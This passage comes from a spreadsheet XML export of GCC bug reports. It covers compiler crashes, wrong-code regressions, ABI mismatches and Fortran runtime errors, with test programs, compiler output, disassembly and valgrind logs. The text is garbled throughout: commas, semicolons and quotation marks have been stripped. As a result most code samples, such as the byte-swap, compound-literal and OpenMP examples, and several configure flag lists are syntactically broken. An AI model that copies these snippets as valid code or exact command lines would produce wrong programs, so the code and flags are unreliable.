configured with: /src/gcc-3.1/configure --prefix=/usr/local --build=i686-linux --host=i686-linux --target=powerpc64-linux --disable-nls --enable-languages=c
How-To-Repeat:
	-O2 on attached testcase
Unformatted:
 --HcAYCG3uE/tztfnV
 Content-Type: text/plain charset=us-ascii
 Content-Disposition: inline</t>
  </si>
  <si>
    <t>GCC-40521</t>
  </si>
  <si>
    <t>[4.4/4.5 Regression] -g causes GCC to generate .eh_frame</t>
  </si>
  <si>
    <t>Put this in main.c and build it with a 4.4-branch compiler using recent binutils:
int main ()
{
  return 0
}
Versions:
GNU assembler (GNU Binutils) 2.19.51.20090611
i686-pc-linux-gnu-gcc (GCC) 4.4.1 20090611 (prerelease)
% i686-pc-linux-gnu-gcc -c main.c objdump --wide -h main.o | grep ALLOC
  0 .text         0000000a  00000000  00000000  00000034  2**2  CONTENTS ALLOC LOAD READONLY CODE
  1 .data         00000000  00000000  00000000  00000040  2**2  CONTENTS ALLOC LOAD DATA
  2 .bss          00000000  00000000  00000000  00000040  2**2  ALLOC
% i686-pc-linux-gnu-gcc -c -g main.c objdump --wide -h main.o | grep ALLOC
  0 .text         0000000a  00000000  00000000  00000034  2**2  CONTENTS ALLOC LOAD READONLY CODE
  1 .data         00000000  00000000  00000000  00000040  2**2  CONTENTS ALLOC LOAD DATA
  2 .bss          00000000  00000000  00000000  00000040  2**2  ALLOC
 12 .eh_frame     00000034  00000000  00000000  000001c0  2**2  CONTENTS ALLOC LOAD RELOC READONLY DATA
We're using GAS's .cfi_startproc et cetera directives to generate debug information.  But they only generate .eh_frame not .debug_frame.
I also noticed this problem on an ARM EABI target.  ARM EABI does not use .eh_frame only .debug_frame and .ARM.exidx.
The easiest fix is to disable use of the CFI directives when we are trying to generate .debug_frame.  I believe GCC used to generate both .debug_frame and .eh_frame for the same function.  If we want both to gain the advantages of using CFI directives (e.g. potentially accurate across inline asm) then we need to teach gas to emit .debug_frame/.eh_frame/both as requested.</t>
  </si>
  <si>
    <t>GCC-2787</t>
  </si>
  <si>
    <t>[sparc-sun-solaris2.7] Compiler dumps core</t>
  </si>
  <si>
    <t>The compiler dumps core with the following testcase:
long double
bug(long double src)
{
  if (src &gt; -0.1 &amp;&amp; src &lt; 0.1)
    {
      int i
      long double r = 1.0
      long double k = 1.0
      long double s = 0.0
      for (i = 1  i &lt; 10  i++)
        {
          r *= src
          k *= (long double)i
          s += r / k
        }
      src = s
    }
  return src
}
int
main()
{
  if (bug(0.05) &lt; 0.051)
    abort()
  exit(0)
}
when compiled with '-O2 -g' on sparc-sun-solaris2.7. The reported
error is:
In function `bug':
20: Internal compiler error in schedule_insns at sched-rgn.c:3070
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
The code compiles when only using -O2 but then the result
is incorrect.
Perhaps this testcase should be added to the gcc.c-torture/execute.
Release:
3.0 and 3.1
Environment:
sparc-sun-solaris2.7</t>
  </si>
  <si>
    <t>haj.ten.brugge</t>
  </si>
  <si>
    <t>GCC-44868</t>
  </si>
  <si>
    <t>[OOP] Error recovery: ICE after invalid TBP call</t>
  </si>
  <si>
    <t>Reported at http://gcc.gnu.org/ml/fortran/2010-07/msg00048.html by Satish.BD
The error is properly diagnosed but afterwards an ICE occurs (on the report's system). For me only invalid reads and writes are shown in valgrind: http://gcc.gnu.org/ml/fortran/2010-07/msg00051.html
I will fill another PR for the follow up problem.</t>
  </si>
  <si>
    <t>GCC-5950</t>
  </si>
  <si>
    <t>ICE on illegal explicit instantiation</t>
  </si>
  <si>
    <t>Trying to compile the file below generates a segmentation fault.
g++ yy.cpp -o xx
yy.cpp:16: Internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
------------- yy.cpp ----
#include 
template  class xx {
public:
        int yy( foo )
}
template  int xx::yy( foo xx )
{
        return xx
}
template int xx::yy
-----------------
Release:
3.0.4
Environment:
Linux</t>
  </si>
  <si>
    <t>GCC-12692</t>
  </si>
  <si>
    <t>__builtin_apply_args broken</t>
  </si>
  <si>
    <t>__builtin_apply_args fails to put float arguments on the stack
Works fine on Linux g++ 3.3.1
Seems to fail on mips-sgi-irix6.5 g++ 3.3 (N32 and 64 ABI)
Also fails on Solaris 2.9 gcc 3.3.1 (see bug #12503 confirmed)
Example:
- funcA is a variadic function
- funcB is a normal function
- funcA is called and should give all its arguments to funcB thanks to
__builtin_apply_args and __builtin_apply
main -&gt; funcA(args) -&gt; funcB(args)
Note: arguments are put in correct order in the stack but float (double)
arguments are set to 0.0
Compile file demo.cpp with g++ -Wall -o demo demo.cpp for N32 or
g++ -Wall -mabi=64 -mips4 -o demo demo.cpp for N64 and run ./demo
Tested on SGI Octane R10000 Irix 6.5.16f g++ 3.3</t>
  </si>
  <si>
    <t>pierre.nguyen-tuong</t>
  </si>
  <si>
    <t>GCC-47541</t>
  </si>
  <si>
    <t>[4.5 Regression] For integer pointers the value of ++*p  is not written back to memory</t>
  </si>
  <si>
    <t>The problem occurs in a copy constructor both for 386 and for X86-64. This is a copy constructor of a reference counting object which uses int* to keep 
track of the number of copies of an A object. The copy constructor messes up it calculates the new count (in some cases) but forgets to write it back to the int*.
The attached test case is a bit complicated yet it is a simplification of real code. There are two options to see the issue:
  $ g++ -O2 -g refcount.cpp &amp;&amp; ./a.out
  Segmentation fault (core dumped)
  $ g++ -O2 -DTRACE -g refcount.cpp &amp;&amp; ./a.out
  A::A()
  RefCount()
  count=1
  RefCount(const RefCount&amp;)
  count=1
  ~RefCount()
  A::~A
  count=0
  Segmentation fault (core dumped)
As you can see the reference is not incremented when it should be.
$ g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-redhat-linux/4.5.1/lto-wrapper
Target: x86_64-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --enable-languages=cc++objcobj-c++javafortranadalto --enable-plugin --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --with-ppl --with-cloog --with-tune=generic --with-arch_32=i686 --build=x86_64-redhat-linux
Thread model: posix
gcc version 4.5.1 20100924 (Red Hat 4.5.1-4) (GCC)</t>
  </si>
  <si>
    <t>veksler</t>
  </si>
  <si>
    <t>GCC-52824</t>
  </si>
  <si>
    <t>[C++11] expanding variadic template arguments into non-variadic template</t>
  </si>
  <si>
    <t>The fix to PR 35722 fixed many cases of expanding variadic template arguments into a non-variadic template. 
However the following example (a simple modification of the PR 35722 example I just removed the default template arguments from 'foo') gives a bogus error:
template
struct foo
{}
template
struct bar : foo
{}
int main() {
  bar f
}
The error is:
test.cpp:6:22: error: wrong number of template arguments (1 should be 2)
test.cpp:2:8: error: provided for 'template struct foo'</t>
  </si>
  <si>
    <t>GCC-25083</t>
  </si>
  <si>
    <t>non-common variable in block data</t>
  </si>
  <si>
    <t>using GNU Fortran 95 (GCC) 4.1.0 20051126 (prerelease)  with '-g -pedantic -std=f95' I get a bad / no diagnostic for the following invalid code:
 BLOCK DATA D
  INTEGER I
  DATA I /1/
 END BLOCK DATA
END</t>
  </si>
  <si>
    <t>GCC-78639</t>
  </si>
  <si>
    <t>[7 Regression] Power9 bad code generation for cactusADM benchmark</t>
  </si>
  <si>
    <t>I was building the Spec 2006 benchmark targeting the forthcoming power9 processor and I noticed the cactusADM benchmark did not build.
The bug is due to my change on November 21st 2016 (subversion id 242679).  If a DImode value in an Altivec register is to be stored with a register+register address the compiler generated STXSD (register+offset) instead of STXSDX (register+register).
In the movdi_internal64 pattern I deleted a 'w' from the STXSD constraint which meant the constraint was using Y instead of wY.  Y allows reg+reg while wY does not (and also enforces a stricter alignment check).</t>
  </si>
  <si>
    <t>GCC-30840</t>
  </si>
  <si>
    <t>[4.3 Regression] ice for legal code with flags -O3 -fno-strict-aliasing</t>
  </si>
  <si>
    <t>I just tried to compile Suse Linux package rxvt-unicode-8.1-3
with the GNU C++ compiler version 4.3 snapshot 20070216.
The compiler said
screen.C: In member function 'void rxvt_term::scr_reset()':
screen.C:160: internal compiler error: in set_lattice_value at tree-ssa-ccp.c:487
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source code attached. Flags -O3 -fno-strict-aliasing required.</t>
  </si>
  <si>
    <t>GCC-14831</t>
  </si>
  <si>
    <t>INQUIRE specifiers BLANK and ACCESS return wrong values</t>
  </si>
  <si>
    <t>Found in NIST f77 test FM914.FOR
    1     FAIL            ERROR IN AN INQUIRE SPECIFIER
                 COMPUTED: IOSTAT=0 EXIST=T OPENED=T NUMBER=  14
                           ACCESS=READWRITE  SEQUENTIAL=YES FORM=FORMATTED
                           FORMATTED=YES BLANK=BLAN
                 CORRECT:  IOSTAT=0 EXIST=T OPENED=T NUMBER=  14
                           ACCESS=SEQUENTIAL SEQUENTIAL=YES FORM=FORMATTED
                           FORMATTED=YES BLANK=NULL
Here is a short program to demonstrate:
       CHARACTER*4 BLANK
       CHARACTER*10 ACCESS
       OPEN(UNIT=9)
       INQUIRE(UNIT=9BLANK=BLANKACCESS=ACCESS)
       PRINT*BLANK
       PRINT*ACCESS
       END
$ gfortran a.f
$ ./a.out
BLAN
READWRITE
and with g77
$ g77 a.f
$ ./a.out
 NULL
 SEQUENTIAL
$ gfortran --version
GNU Fortran 95 (GCC 3.5-tree-ssa 20040401 (merged 20040324))</t>
  </si>
  <si>
    <t>GCC-64553</t>
  </si>
  <si>
    <t>[5 Regression] Missing '# ifdef _GLIBCXX_USE_WCHAR_T' in src/c++11/cxx11-shim_facet.cc</t>
  </si>
  <si>
    <t>wchar related defines are exposed in the new std::string implementation even if wchar.h is not fully usable (_GLIBCXX_USE_WCHAR_T not defined).
The result is bootstrap stage 2 failure due to unresolved external references. Noticed this when trying to bootstrap GCC for DJGPP</t>
  </si>
  <si>
    <t>GCC-79747</t>
  </si>
  <si>
    <t>Missing documentation for -malign-{jumpslabelloopsfunctions}= and strange value range limitation</t>
  </si>
  <si>
    <t>Hello.
I hit following issues related to these options:
1) PDF documentation does not document these options with trailing equals sign.
2) -malign-call is still present in documentation =&gt; I'll prepare patch for that
3) -malign-functions (and other) do limit range a user can use:
./xgcc -B. -malign-functions=1611 /tmp/empty.c
cc1: warning: -malign-functions is obsolete use -falign-functions
cc1: error: -malign-functions=1611 is not between 0 and 16
While using -falign-function accepts arbitrary value:
$ ./xgcc -B. -falign-functions=12345 /tmp/a.c -S -c &amp;&amp; grep align a.s
...
	.p2align 1412344
I'm not sure how to properly fix 3)?</t>
  </si>
  <si>
    <t>GCC-6064</t>
  </si>
  <si>
    <t>byte swap function returns bad value</t>
  </si>
  <si>
    <t>Compile and run the following program:
    unsigned int byteSwap(unsigned int * word)
    {
        char* byte
        unsigned int *uip
        char newWord[4]
        byte = (char*) word
        newWord[3] = *byte++
        newWord[2] = *byte++
        newWord[1] = *byte++
        newWord[0] = *byte++
        uip = (unsigned int*)newWord
        return *uip
    }
    main(int argc char **argv)
    {
        unsigned int ui
        ui=0x11223344
        printf(%08x\n byteSwap(
    }
If -O2 optimization is used the output is: 4433f894 (incorrect)
If -O1 optimization is used the output is: 44332211 (correct)
With -O2 optimization if the variable newWord is declared static
the output is correct.
Release:
gcc-2.96-85
Environment:
Red Hat Linux 7.1 plus some errata
gcc rpm is 2.96-85
Pentium III processor</t>
  </si>
  <si>
    <t>dp</t>
  </si>
  <si>
    <t>GCC-68265</t>
  </si>
  <si>
    <t>Arbitrary syntactic nonsense silently accepted after 'int (*){}' until the next close brace</t>
  </si>
  <si>
    <t>(From https://stackoverflow.com/questions/33614455/ :)
The C++ compiler fails to diagnose ill-formed constructs such as
  int main()
  {
      int (*) {}
         any amount of syntactic nonsense
         on multiple lines with *punctuation* and ++operators++ even...
         will be silently discarded
         until the next close brace
  }
With -pedantic -std=c++98 you do get warning: extended initializer lists only available with -std=c++11 or -std=gnu++11 but with -std=c++11 not a peep.
If any one (or more) of the tokens 'int ( * ) { }' are removed you do get an error.  Also the C compiler does not have the same bug.</t>
  </si>
  <si>
    <t>GCC-19192</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5 Regression] Current development gcc generates inaccurate line info for example code</t>
  </si>
  <si>
    <t xml:space="preserve">
For the supplied example the current development gcc generates
incorrect line number information for one instruction from the inlined
subroutine.  The Fedora Core 3 gcc which identifies itself as gcc
version 3.4.2 20041017 (Red Hat 3.4.2-6.fc3) generates correct line
information.
Environment:
System: Linux toadfish.ninemoons.com 2.6.9-1.681_FC3.stk16 #1 Mon Nov 22 16:44:32 EST 2004 i686 i686 i386 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /src/sourceware/gcc/gcc/configure -v --prefix=/opt/local/sourceware --with-gcc-version-trigger=/src/sourceware/gcc/gcc/gcc/version.c --enable-languages=cc++
How-To-Repeat:
For the follow code:
  /*  1 */  int add2 (int a int b)
  /*  2 */  {
  /*  3 */    return (a + b)
  /*  4 */  }
  /*  5 */  
  /*  6 */  inline int add3 (int a int b int c)
  /*  7 */  {
  /*  8 */    return (a + add2 (b  c))
  /*  9 */  }
  /* 10 */  
  /* 11 */  main ()
  /* 12 */  {
  /* 13 */    printf (%d\n add3 (2 3 4))
  /* 14 */  }
Run:
  gcc -g -O2 --save-temps -o t t.c
  readelf --debug-dump t &gt;t.dwarf
  objdump --disassemble t &gt;t.dis
There relevant line table entries from t.dwarf are:
  Special opcode 36: advance Address by 2 to 0x80483a0 and Line by 3 to 12
  Special opcode 15: advance Address by 1 to 0x80483a1 and Line by -4 to 8
  Special opcode 79: advance Address by 5 to 0x80483a6 and Line by 4 to 12
  Special opcode 75: advance Address by 5 to 0x80483ab and Line by 0 to 12
  Special opcode 85: advance Address by 6 to 0x80483b1 and Line by -4 to 8
  Special opcode 234: advance Address by 16 to 0x80483c1 and Line by 5 to 13
  Advance PC by constant 17 to 0x80483d2
  Special opcode 34: advance Address by 2 to 0x80483d4 and Line by 1 to 14
  Advance PC by 2 to 80483d6
I've annotated the disassembly of main() with the line numbers given by
the above entries:
    12      080483a0 :
    12       80483a0:       55                      push   %ebp
     8       80483a1:       b8 04 00 00 00          mov    $0x4%eax
    12       80483a6:       89 e5                   mov    %esp%ebp
    12       80483a8:       83 ec 08                sub    $0x8%esp
    12       80483ab:       83 e4 f0                and    $0xfffffff0%esp
    12       80483ae:       83 ec 10                sub    $0x10%esp
     8       80483b1:       89 44 24 04             mov    %eax0x4(%esp)
     8       80483b5:       c7 04 24 03 00 00 00    movl   $0x3(%esp)
     8       80483bc:       e8 af ff ff ff          call   8048370 
    13       80483c1:       c7 04 24 c8 84 04 08    movl   $0x80484c8(%esp)
 ** 13       80483c8:       83 c0 02                add    $0x2%eax
    13       80483cb:       89 44 24 04             mov    %eax0x4(%esp)
    13       80483cf:       e8 dc fe ff ff          call   80482b0 
    14       80483d4:       c9                      leave  
    14       80483d5:       c3                      ret    
The add $0x2%eax instruction marked with '**' is supposed to be at
line 8 not line 13.      
If you go through the same exercise with the Fedora Core 3 compiler it does
correctly identify this instruction as being at line 8.</t>
  </si>
  <si>
    <t>GCC-69311</t>
  </si>
  <si>
    <t>[5 Regression] ICE (cc1 killed) on s390x-linux-gnu</t>
  </si>
  <si>
    <t>Created attachment 37370
preprocessed source
seen with the current gcc-5-branch as well with a cross compiler -O2 works 4.9 and trunk work as well.
$ s390x-linux-gnu-gcc -std=c99 -Wall -march=zEC12 -O2 -c  tiny_psnr.i</t>
  </si>
  <si>
    <t>GCC-50738</t>
  </si>
  <si>
    <t>[4.7 Regression] Bootstrap failure at revision 180028 on powerpc-apple-darwin9</t>
  </si>
  <si>
    <t>On powerpc-apple-darwin9 at revision 180029 bootstrap fails with:
gcc -c   -O0 -g -fexceptions -mmacosx-version-min=10.4 -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../work/gcc -I../../work/gcc/. -I../../work/gcc/../include -I../../work/gcc/../libcpp/include -I/sw/include  -I../../work/gcc/../libdecnumber -I../../work/gcc/../libdecnumber/dpd -I../libdecnumber  -I/sw/include -DCLOOG_INT_GMP -DCLOOG_ORG  ../../work/gcc/ifcvt.c -o ifcvt.o
../../work/gcc/ifcvt.c: In function 'dead_or_predicable':
../../work/gcc/ifcvt.c:4176: error: 'HAVE_simple_return' undeclared (first use in this function)
../../work/gcc/ifcvt.c:4176: error: (Each undeclared identifier is reported only once
../../work/gcc/ifcvt.c:4176: error: for each function it appears in.)
This has been introduced by revision 180028
Author:	amodra
Date:	Sat Oct 15 10:36:00 2011 UTC (65 minutes 35 seconds ago)
Changed paths:	2
Log Message:	
	* ifcvt.c (dead_or_predicable): Disable if-conversion when
	doing so is likely to kill a shrink-wrapping opportunity.
I am now testing the new block protected by '#ifdef HAVE_simple_return' as done elsewhere.</t>
  </si>
  <si>
    <t>GCC-63938</t>
  </si>
  <si>
    <t>OpenMP atomic update does not protect access to automatic array</t>
  </si>
  <si>
    <t>It appears that performing !$omp atomic update on an automatic array does not protect access to the array. As an example consider the following program:
program atomic
  integer :: i x(1)
  x(1) = 0
!$omp parallel do
  do i = 1 1000
    !$omp atomic
    x(1) = x(1) + 1
  end do
!$omp end parallel do
  print * x
end program atomic
Compiling and running this program should result in the value 1000. Instead it results in an unpredictable value for x indicating there is a race condition. If you change x to a scalar or an allocatable array it works fine and reports the value 1000. Equivalent code in C does not produce a race condition. The code gives the correct value when compiled with the Intel fortran compiler.
Information on my build of gcc:
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --disable-multilib
Thread model: posix</t>
  </si>
  <si>
    <t>paul.k.romano</t>
  </si>
  <si>
    <t>GCC-53220</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] g++ mis-compiles compound literals</t>
  </si>
  <si>
    <t>This appears to be a gcc-4.7 regression. Confirmed in:
g++ (GCC) 4.8.0 20120331 (experimental)
g++ (GCC) 4.8.0 20120503 (experimental)
#include 
int main()
{
  for (int *p = (int[]){ 1 2 3 0} *p ++p) {
    printf(%d\n *p)
  }
  return 0
}
gcc -std=c99 t2.c &amp;&amp; ./a.out
1
2
3
gcc -std=c99 -O2 t2.c &amp;&amp; ./a.out
1
2
3
g++ t2.c &amp;&amp; ./a.out
1
2
3
g++ -O2 -g t2.c &amp;&amp; ./a.out
944127552
32767
AFAICT g++ completely removes the initializer and reads random garbage off stack:
(gdb) disas main
Dump of assembler code for function main():
   0x0000000000400600 :     push   %rbx
   0x0000000000400601 :     sub    $0x10%rsp
   0x0000000000400605 :     mov    (%rsp)%esi
   0x0000000000400608 :     mov    %rsp%rbx
   0x000000000040060b :    test   %esi%esi
   0x000000000040060d :    je     0x400626 
   0x000000000040060f :    nop
   0x0000000000400610 :    xor    %eax%eax
   0x0000000000400612 :    add    $0x4%rbx
   0x0000000000400616 :    mov    $0x40071c%edi
   0x000000000040061b :    callq  0x400478 
   0x0000000000400620 :    mov    (%rbx)%esi
   0x0000000000400622 :    test   %esi%esi
   0x0000000000400624 :    jne    0x400610 
   0x0000000000400626 :    add    $0x10%rsp
   0x000000000040062a :    xor    %eax%eax
   0x000000000040062c :    pop    %rbx
   0x000000000040062d :    retq   
End of assembler dump.
valgrind ./a.out
...
==13572== Conditional jump or move depends on uninitialised value(s)
==13572==    at 0x40060D: main (/tmp/t2.c:5)
==13572== 
==13572== Use of uninitialised value of size 8
==13572==    at 0x5625E4B: _itoa_word (/build/buildd/eglibc-2.11.1/stdio-common/_itoa.c:195)
==13572==    by 0x5628A87: vfprintf (/build/buildd/eglibc-2.11.1/stdio-common/vfprintf.c:1616)
==13572==    by 0x5631659: printf (/build/buildd/eglibc-2.11.1/stdio-common/printf.c:35)
==13572==    by 0x40061F: main (/tmp/t2.c:6)
==13572== 
==13572== Conditional jump or move depends on uninitialised value(s)
==13572==    at 0x5625E55: _itoa_word (/build/buildd/eglibc-2.11.1/stdio-common/_itoa.c:195)
==13572==    by 0x5628A87: vfprintf (/build/buildd/eglibc-2.11.1/stdio-common/vfprintf.c:1616)
==13572==    by 0x5631659: printf (/build/buildd/eglibc-2.11.1/stdio-common/printf.c:35)
==13572==    by 0x40061F: main (/tmp/t2.c:6)
==13572== 
==13572== Conditional jump or move depends on uninitialised value(s)
==13572==    at 0x5627ED2: vfprintf (/build/buildd/eglibc-2.11.1/stdio-common/vfprintf.c:1616)
==13572==    by 0x5631659: printf (/build/buildd/eglibc-2.11.1/stdio-common/printf.c:35)
==13572==    by 0x40061F: main (/tmp/t2.c:6)
==13572== 
==13572== Conditional jump or move depends on uninitialised value(s)
==13572==    at 0x5627EF0: vfprintf (/build/buildd/eglibc-2.11.1/stdio-common/vfprintf.c:1616)
==13572==    by 0x5631659: printf (/build/buildd/eglibc-2.11.1/stdio-common/printf.c:35)
==13572==    by 0x40061F: main (/tmp/t2.c:6)
==13572== 
-16780368
==13572== Conditional jump or move depends on uninitialised value(s)
==13572==    at 0x400624: main (/tmp/t2.c:5)
==13572== 
127
...
Google ref: b/6439133</t>
  </si>
  <si>
    <t>GCC-4047</t>
  </si>
  <si>
    <t>assuming &amp; on overloaded member functions</t>
  </si>
  <si>
    <t>when we use an overloaded static member function as 
another function's input argument g++ report assuming
&amp; on overloaded member functions.
This bug does not appear in GCC3.0 though I haven't seen a
similar bug report before.
Release:
2.95.2 2.95.3
Environment:
suse7.0 suse7.2
How-To-Repeat:
#include 
typedef int (*COMPTR) (char* void*)
class Component
{
  public:
  static int foo(char* str void* ptr)
  {
    return 888
  }
  static int foo(int x)
  {
    return -x
  }
}
class Server
{
  public:
  void use(COMPTR func)
  {
    printf(%i\nfunc(1234 NULL))
  }
}
Server server
template
class User
{
  public:
  void call()
  {
    server.use(T::foo)	  
  }
}
int main()
{
  User uc
  uc.call()
}</t>
  </si>
  <si>
    <t>yuzhang</t>
  </si>
  <si>
    <t>GCC-40991</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE: at optimization -02</t>
  </si>
  <si>
    <t>The following gives:
%/mnt/share/bld/gcc/./gcc/g++ -shared-libgcc -B/mnt/share/bld/gcc/./gcc -nostdinc++ -L/mnt/share/bld/gcc/x86_64-unknown-linux-gnu/libstdc++-v3/src -L/mnt/share/bld/gcc/x86_64-unknown-linux-gnu/libstdc++-v3/src/.libs -B/mnt/share/bld/H-x86-gcc/x86_64-unknown-linux-gnu/bin/ -B/mnt/share/bld/H-x86-gcc/x86_64-unknown-linux-gnu/lib/ -isystem /mnt/share/bld/H-x86-gcc/x86_64-unknown-linux-gnu/include -isystem /mnt/share/bld/H-x86-gcc/x86_64-unknown-linux-gnu/sys-include -g -O2 -D_GLIBCXX_ASSERT -fmessage-length=0 -ffunction-sections -fdata-sections -g -O2 -D_GNU_SOURCE -g -O2 -D_GNU_SOURCE -DLOCALEDIR=. -nostdinc++ -I/mnt/share/bld/gcc/x86_64-unknown-linux-gnu/libstdc++-v3/include/x86_64-unknown-linux-gnu -I/mnt/share/bld/gcc/x86_64-unknown-linux-gnu/libstdc++-v3/include -I/mnt/share/src/gcc/libstdc++-v3/libsupc++ -I/mnt/share/src/gcc/libstdc++-v3/include/backward -I/mnt/share/src/gcc/libstdc++-v3/testsuite/util /mnt/share/src/gcc/libstdc++-v3/testsuite/tr1/3_function_objects/function/5.cc -include bits/stdc++.h ./libtestc++.a -Wl--gc-sections -c -lm -o ./5.exe
/mnt/share/src/gcc/libstdc++-v3/testsuite/tr1/3_function_objects/function/5.cc: In function â€˜void test05()â€™:
/mnt/share/src/gcc/libstdc++-v3/testsuite/tr1/3_function_objects/function/5.cc:30:6: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
If it's compiled with -O0 -O1 then it's ok.</t>
  </si>
  <si>
    <t>GCC-1971</t>
  </si>
  <si>
    <t>ObjectOutputStream generates incorrect serialVersionUID's for array classes</t>
  </si>
  <si>
    <t>Run the attached test case. GCJ can deserialize JDK's objects
ok but JDK can't deserialize objects generated from GCJ:
$ java SerTest S
5 4 3 2 1 
$ ./st D
5 4 3 2 1
$ ./st S
5 4 3 2 1
$ java SerTest D
$ java SerTest D
IOException java.io.InvalidClassException: [I Local class not compatible: stream classdesc serialVersionUID=-222323706161665130 local class serialVersionUID=5600894804908749477
Exception in thread main java.lang.ClassCastException: java.lang.Object
        at SerTest.main(SerTest.java:39)
Release:
gcc version 2.97 20010207 (experimental)</t>
  </si>
  <si>
    <t>GCC-31686</t>
  </si>
  <si>
    <t>wrong codegen from reload</t>
  </si>
  <si>
    <t>See failing test analysis suggested patch here:
http://gcc.gnu.org/ml/gcc-patches/2007-04/msg01595.html</t>
  </si>
  <si>
    <t>hm.chang</t>
  </si>
  <si>
    <t>GCC-19481</t>
  </si>
  <si>
    <t>libgfortran doesn't build -- configure doesn't handle cabs() well</t>
  </si>
  <si>
    <t>This one is strange. On i686-mingw compiling gfortran fails with:
../../../gcc/libgfortran/generated/exp_c8.c:38: error: conflicting types for 'cabs'
/mingw/include/math.h:223: error: previous declaration of 'cabs' was here
make[2]: *** [exp_c8.lo] Error 1
make[2]: Leaving directory `/home/coudert/ibin/i686-pc-mingw32/libgfortran'
make[1]: *** [all] Error 2
I guess somewhere in the configure process the presence of cabs() in math.h
was not detected. This is not specific to i686-mingw since the same thing
happens on mips-sgi-irix6.5 (which I reported as comment #7 in PR15266).
So I submit a new PR (hope component=bootstrap was the right choice not
sure) so that GNU build utils gurus can get this fixed. I am ready to give any
extra information needed but I don't know what may be useful at that point.
PS: configure was a simple ../gcc/configure --prefix=/mingw --enable-languages=cf95</t>
  </si>
  <si>
    <t>GCC-32987</t>
  </si>
  <si>
    <t>TAB in FORMAT: accept extension warn with -std=f*</t>
  </si>
  <si>
    <t>GFortarn has runtime error when FORMAT has TAB char between parameters (see testcase)
10     format ('Hello '	'bug!')
                         ^^^
&gt; ./a.out
At line 2 of file format_with_tab.f
Fortran runtime error: Unexpected element in format
('Hello '      'bug!')
           ^
This bug is reproduced in 4.1.2</t>
  </si>
  <si>
    <t>satyaakam</t>
  </si>
  <si>
    <t>GCC-35491</t>
  </si>
  <si>
    <t>wrong ABI for some struct passing with vector code</t>
  </si>
  <si>
    <t>Take the following code:
#define vector __vector
struct data {
     float f  //0 - 3
     int i    // 4 - 7
     double d // 8 - 15
     vector float v  // 16 - 31
   }// __attribute__ ((d64_abi))  //size is 32
   extern int bar (int a struct data b void *c)
   int foo (struct data *inp_r3 void *inp_r4)
   {
     return bar(10 *inp_r3 ((void *) inp_r4))
   }
--- CUT ---
We get:
_foo:
        mflr r0
        std r016(r1)
        stdu r1-128(r1)
        mfspr r0256
        stw r0124(r1)
        oris r0r00x2000
        mtspr 256r0
        li r016
        lfs f10(r3)
        lvx v2r3r0
        mr r10r4  &lt;--- note r10
        lfd f28(r3)
        lwz r54(r3)
        li r310
        bl L_bar$stub
        addi r1r1128
        lwz r12-4(r1)
        mtspr 256r12
        ld r016(r1)
        mtlr r0
        blr
--- CUT ---
With Apple's compiler we get:
_foo:
        mfspr r0256
        stw r0-12(r1)
        oris r0r00x2000
        mtspr 256r0
        mflr r0
        mr r9r4  &lt;--- NOTE r9
        std r016(r1)
        stdu r1-128(r1)
        li r016
        nop
        lfs f10(r3)
        lfd f28(r3)
        lwz r54(r3)
        lvx v2r3r0
        li r310
        bl L_bar$stub
        addi r1r1128
        lwz r12-12(r1)
        mtspr 256r12
        ld r016(r1)
        mtlr r0
        blr</t>
  </si>
  <si>
    <t>GCC-56403</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] internal compiler error: in build_zero_init_1 at cp/init.c:279</t>
  </si>
  <si>
    <t>Created attachment 29504
Preprocessed output from the source files that reproduce this bug
(I'm re-filing this bug per suggestion from the downstream Ubuntu bug tracker:   Upon further investigation the bug doesn't appear to be Ubuntu-specific.)
I've hit this bug on several g++ versions but am primarily running 4.6.3 as bundled with Ubuntu 12.04 on a relatively stock system:
$ gcc -v
Using built-in specs.
COLLECT_GCC=/usr/bin/gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.6/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.6.3-1ubuntu5' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --enable-objc-gc --disable-werror --with-arch-32=i686 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) 
$ g++ --version
g++ (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3
Copyright (C) 2011 Free Software Foundation Inc.
This is free software see the source for copying conditions. There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
